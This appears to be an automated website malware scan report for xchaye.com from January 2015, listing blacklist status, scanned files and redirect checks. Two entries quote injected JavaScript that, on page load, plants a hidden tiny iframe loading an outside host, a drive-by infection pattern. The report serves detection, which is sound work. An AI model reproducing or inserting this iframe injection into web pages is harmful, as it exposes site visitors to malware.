Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=xchaye.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://xchaye.com/ | 200 OK Content-Length: 45070 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) {
showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Antivirus reports:
| ||
http://www.xchaye.com/wp-includes/js/jquery/jquery.js?ver=1.7.2 | HTTP/1.1 200 OK Date: Wed, 28 Jan 2015 06:01:11 GMT Accept-Ranges: bytes ETag: "0984aeb4310cd1:28e15" Server: IIS Content-Length: 94861 Content-Location: http://www.xchaye.com/wp-includes/js/jquery/jquery.js?ver=1.7.2 Content-Type: application/x-javascript Last-Modified: Sun, 01 Apr 2012 20:13:36 GMT X-Powered-By: WAF/2.0 | clean |
http://www.xchaye.com/test404page.js | 404 Not Found Content-Length: 39877 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) {
showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Antivirus reports:
| ||
http://adultbiz.in/new/jquery.php | 200 OK Content-Length: 8681 Content-Type: text/html | clean |
http://d32ffatx74qnju.cloudfront.net/scripts/js3caf.js | 200 OK Content-Length: 3490 Content-Type: application/javascript | clean |
http://d32ffatx74qnju.cloudfront.net/scripts/tier2caf.js | 200 OK Content-Length: 28902 Content-Type: application/javascript | clean |
http://adultbiz.in/scripts/feedmeCaf.php?q=&ip=78.158.11.226&max=10&hl=lt&d=adultbiz.in&ron=0&adult=0 | 200 OK Content-Length: 5590 Content-Type: text/plain | clean |
http://adultbiz.in/test404page.js | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.1/jquery-ui.min.js | 200 OK Content-Length: 185442 Content-Type: text/javascript | clean |
http://www.xchaye.com/wp-content/themes/TheProfessional/js/jquery.cycle.all.min.js | HTTP/1.1 200 OK Date: Wed, 28 Jan 2015 06:01:22 GMT Accept-Ranges: bytes ETag: "187fb76f84edcd1:28e15" Server: IIS Content-Length: 27880 Content-Location: http://www.xchaye.com/wp-content/themes/TheProfessional/js/jquery.cycle.all.min.js Content-Type: application/x-javascript Last-Modified: Tue, 08 Jan 2013 09:42:12 GMT X-Powered-By: WAF/2.0 | clean |
http://www.xchaye.com/wp-content/themes/theprofessional/js/jquery.cycle.all.min.js | HTTP/1.1 200 OK Date: Wed, 28 Jan 2015 06:01:24 GMT Accept-Ranges: bytes ETag: "187fb76f84edcd1:28e15" Server: IIS Content-Length: 27880 Content-Location: http://www.xchaye.com/wp-content/themes/theprofessional/js/jquery.cycle.all.min.js Content-Type: application/x-javascript Last-Modified: Tue, 08 Jan 2013 09:42:12 GMT X-Powered-By: WAF/2.0 | clean |
http://www.xchaye.com/wp-content/themes/TheProfessional/js/jquery.easing.1.3.js | HTTP/1.1 200 OK Date: Wed, 28 Jan 2015 06:01:26 GMT Accept-Ranges: bytes ETag: "b22c67084edcd1:28e15" Server: IIS Content-Length: 8097 Content-Location: http://www.xchaye.com/wp-content/themes/TheProfessional/js/jquery.easing.1.3.js Content-Type: application/x-javascript Last-Modified: Tue, 08 Jan 2013 09:42:13 GMT X-Powered-By: WAF/2.0 | clean |
http://www.xchaye.com/wp-content/themes/theprofessional/js/jquery.easing.1.3.js | HTTP/1.1 200 OK Date: Wed, 28 Jan 2015 06:01:27 GMT Accept-Ranges: bytes ETag: "b22c67084edcd1:28e15" Server: IIS Content-Length: 8097 Content-Location: http://www.xchaye.com/wp-content/themes/theprofessional/js/jquery.easing.1.3.js Content-Type: application/x-javascript Last-Modified: Tue, 08 Jan 2013 09:42:13 GMT X-Powered-By: WAF/2.0 | clean |
http://www.xchaye.com/wp-content/themes/TheProfessional/js/superfish.js | HTTP/1.1 200 OK Date: Wed, 28 Jan 2015 06:01:29 GMT Accept-Ranges: bytes ETag: "de5a57184edcd1:28e15" Server: IIS Content-Length: 3714 Content-Location: http://www.xchaye.com/wp-content/themes/TheProfessional/js/superfish.js Content-Type: application/x-javascript Last-Modified: Tue, 08 Jan 2013 09:42:16 GMT X-Powered-By: WAF/2.0 | clean |
http://www.xchaye.com/wp-content/themes/theprofessional/js/superfish.js | HTTP/1.1 200 OK Date: Wed, 28 Jan 2015 06:01:30 GMT Accept-Ranges: bytes ETag: "de5a57184edcd1:28e15" Server: IIS Content-Length: 3714 Content-Location: http://www.xchaye.com/wp-content/themes/theprofessional/js/superfish.js Content-Type: application/x-javascript Last-Modified: Tue, 08 Jan 2013 09:42:16 GMT X-Powered-By: WAF/2.0 | clean |
http://www.xchaye.com/wp-content/themes/TheProfessional/js/jquery.lavalamp.1.3.3-min.js | HTTP/1.1 200 OK Date: Wed, 28 Jan 2015 06:01:31 GMT Accept-Ranges: bytes ETag: "146b697184edcd1:28e15" Server: IIS Content-Length: 8924 Content-Location: http://www.xchaye.com/wp-content/themes/TheProfessional/js/jquery.lavalamp.1.3.3-min.js Content-Type: application/x-javascript Last-Modified: Tue, 08 Jan 2013 09:42:15 GMT X-Powered-By: WAF/2.0 | clean |
http://www.xchaye.com/wp-content/themes/theprofessional/js/jquery.lavalamp.1.3.3-min.js | HTTP/1.1 200 OK Date: Wed, 28 Jan 2015 06:01:32 GMT Accept-Ranges: bytes ETag: "146b697184edcd1:28e15" Server: IIS Content-Length: 8924 Content-Location: http://www.xchaye.com/wp-content/themes/theprofessional/js/jquery.lavalamp.1.3.3-min.js Content-Type: application/x-javascript Last-Modified: Tue, 08 Jan 2013 09:42:15 GMT X-Powered-By: WAF/2.0 | clean |
http://s94.cnzz.com/stat.php?id=4091345&web_id=4091345 | 200 OK Content-Length: 10071 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: xchaye.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 28 Jan 2015 06:01:08 GMT
Server: IIS
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.xchaye.com/xmlrpc.php
X-Powered-By: WAF/2.0
X-Powered-By: WAF/2.0
GET / HTTP/1.1
Host: xchaye.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 28 Jan 2015 06:01:08 GMT
Server: IIS
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.xchaye.com/xmlrpc.php
X-Powered-By: WAF/2.0
X-Powered-By: WAF/2.0
Second query (visit from search engine):
GET / HTTP/1.1
Host: xchaye.com
Referer: http://www.google.com/search?q=xchaye.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: xchaye.com
Referer: http://www.google.com/search?q=xchaye.com
Result:
The result is similar to the first query. There are no suspicious redirects found.